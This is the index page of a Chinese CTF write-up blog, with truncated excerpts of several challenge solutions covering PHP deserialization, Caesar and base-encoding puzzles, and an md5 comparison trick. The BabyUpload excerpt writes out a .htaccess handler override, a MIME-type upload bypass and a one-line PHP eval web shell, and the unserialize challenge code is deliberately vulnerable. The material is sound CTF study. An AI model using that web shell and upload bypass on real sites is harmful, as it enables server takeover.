https://pic.imgdb.cn/item/64a29e5b1ddac507cc038d97.jpg

Lyrio's blog

[SWPUCTF 2022 新生赛]1z_unserialize

[SWPUCTF 2022 新生赛]1z_unserialize题目: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php class lyh{ public $url = 'NSSCTF.com'; public $lt; public $lly; function __destruct() { $a = $this->lt; $a($this->lly); } } unserialize($_POST['nss']); highlight_file(__FILE__); ?> __destruct 魔术

[SWPUCTF 2021 新生赛]ez_caesar

[SWPUCTF 2021 新生赛]ez_caesar附件: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 import base64 def caesar(plaintext): str_list = list(plaintext) i = 0 while i < len(plaintext): if not str_list[i].isalpha(): str_list[i] = str_list[i] else: a = "A" if str_list[i].isupper() else "a" str_list[i] = chr((ord(str_list[i]) - ord(a)

[SWPUCTF 2021 新生赛]crypto6

[SWPUCTF 2021 新生赛]crypto6拿到附件: 1 2 3 4 5 var="************************************" flag='NSSCTF{' + base64.b16encode(base64.b32encode(base64.b64encode(var.encode()))) + '}' print(flag) 小明不小心泄露了源码,输出结果为:4A5A4C564B36434E4B52415

[SWPUCTF 2021 新生赛]nc签到

[SWPUCTF 2021 新生赛]nc签到附件的内容: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 import os art = ''' (( "####@@!!$$ )) `#####@@!$$` )) (( '####@!!$: (( ,####@!!$: )) .###@!!$: `##@@!$: `#@!!$ !@# `#@!$: @#$ #$ `#@!$: !@!

[泉信杯 2023]Web-WP

[泉信杯 2023]Web-WP Easy PHP题目: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 <?php highlight_file(__FILE__); $flag = null; include '/flag_change'; $a = $_SERVER['argv'][0]; $b = $_SERVER['argv'][1]; $c = $_SERVER['HTTP_CLIENT_IP']; if ($a == md5($b) && $a != $b && $a == md5($a)) { if (isset($c)) { echo $flag; } else { echo '

[GXYCTF 2019]BabyUpload

[GXYCTF 2019]BabyUpload上传.htaccess,内容: 1 2 3 <FilesMatch "Lyrio.jpg"> SetHandler application/x-httpd-php </FilesMatch> 并且利用 MIME 绕过:更改 Content-Type 上传Lyrio.jpg,内容: 1 2 GIF89A <script language='php'>@eval($_POST["Lyrio"]);phpinfo();</script>